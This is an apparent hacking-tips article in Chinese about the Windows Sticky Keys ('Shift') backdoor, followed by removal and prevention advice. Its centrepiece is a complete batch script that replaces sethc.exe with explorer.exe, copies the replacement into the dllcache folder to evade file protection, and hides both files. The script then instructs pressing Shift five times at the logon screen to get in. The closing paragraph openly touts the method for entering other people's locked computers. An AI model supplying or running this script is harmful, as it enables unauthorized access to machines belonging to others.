資深黑客介紹shift後門相關必知知識

資深黑客告訴大家需要將下面的代碼直接粘貼進去,其原理的話就是需要能夠利用explorer.exe這種資源管理器進程來直接替換調用相關的shift默認啟動相關程序,然後的話就能直接覆蓋原來windows的保護文件


shift後門利用的原理

資深黑客告訴大家需要將下面的代碼直接粘貼進去,其原理的話就是需要能夠利用explorer.exe這種資源管理器進程來直接替換調用相關的shift默認啟動相關程序,然後的話就能直接覆蓋原來windows的保護文件;使用這種方法的話也就是為了能夠有效防止文件保護系統檢測到文件被進行修改,如果被系統檢測到後就會造成重啟後這些被修改的文件還將被還原,甚至直接就會造成copy文件失去相關的作用,進行調用shift後門的話也就是真正程序上的桌面進程,大家的話也能利用這種方法直接替換屏幕鍵盤、放大鏡和組合鍵。

代碼:
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift後門
echo.sproink
@copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
@copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
@attrib c:\windows\system32\sethc.exe +h
@attrib c:\windows\system32\dllcache\sethc.exe +h
echo 使用方法:本文件執行完畢後,
echo 在終端界面按Shift 5次即可登陸系統!
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 後門安裝完畢!
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit

shift後門的清除和預防方法

shift後門清除話具體操作就是直接打開相關的控制面板,再依次進行選擇點擊輔助功能選項-粘滯鍵-設置-去掉使用的相關快捷鍵的勾;資深黑客建議大家需要能夠修改下copy.exe的權限,推薦大家可以把電腦C盤下所有的程序都給進行修改下,讓只有administrator用戶才能進行有效的訪問,也只有這樣的話才能有效的進行清除。

還有shift後門的預防方法就是,大家需要進行連續敲五次shift鍵盤,接著的話就能在彈出的相關設置中直接取消連滯鍵就好了;當然了最重要的還有需要將attrib c:\windows\system32\sethc.exe -h

attrib c:\windows\system32\dllcache\sethc.exe -h 進行拷貝新的 c:\windows\system32\sethc.exe 文件到 c:\windows\system32\目錄下;接著的話拷貝新的c:\windows\system32\dllcache\sethc.exe到c:\windows\system32\dllcache\目錄下 ;還有就是在c:\windows\system32及c:\windows\system32\dllcache\下找到sethc.exe 禁止所有用戶權限或拒絕訪問這樣就能有效的預防shift後門了。

另外資深黑客也還告訴大家,shift後門利用和清除方法相關必知知識只要大家能夠進行掌握不但能夠在日常中避免自己的電腦遭到不明的攻擊,而且的話利用shift後門就能幫助大家輕松進入加密後的他人電腦中。